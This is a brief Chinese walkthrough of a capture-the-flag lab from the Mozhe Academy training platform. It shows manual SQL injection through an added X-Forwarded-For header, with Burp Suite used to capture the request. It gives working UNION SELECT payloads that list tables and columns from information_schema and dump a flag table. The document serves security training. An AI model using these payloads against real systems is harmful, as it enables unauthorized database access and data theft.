墨者学院
手工注入
使用BrupSuite捕获flag.php页面的报文并发送到Repeater
发现报文中并没有X-Forwarded-for条目,自己添加
在X-Forwarded-for条目后面使用mysql注入语句测试注入
判断字段:使用order by,测试出有四个字段
判断表名
union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())
判断列名
union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘flag’)
找到flag
union select 1,2,3,(select group_concat(name) from flag)
输入flag,得到key。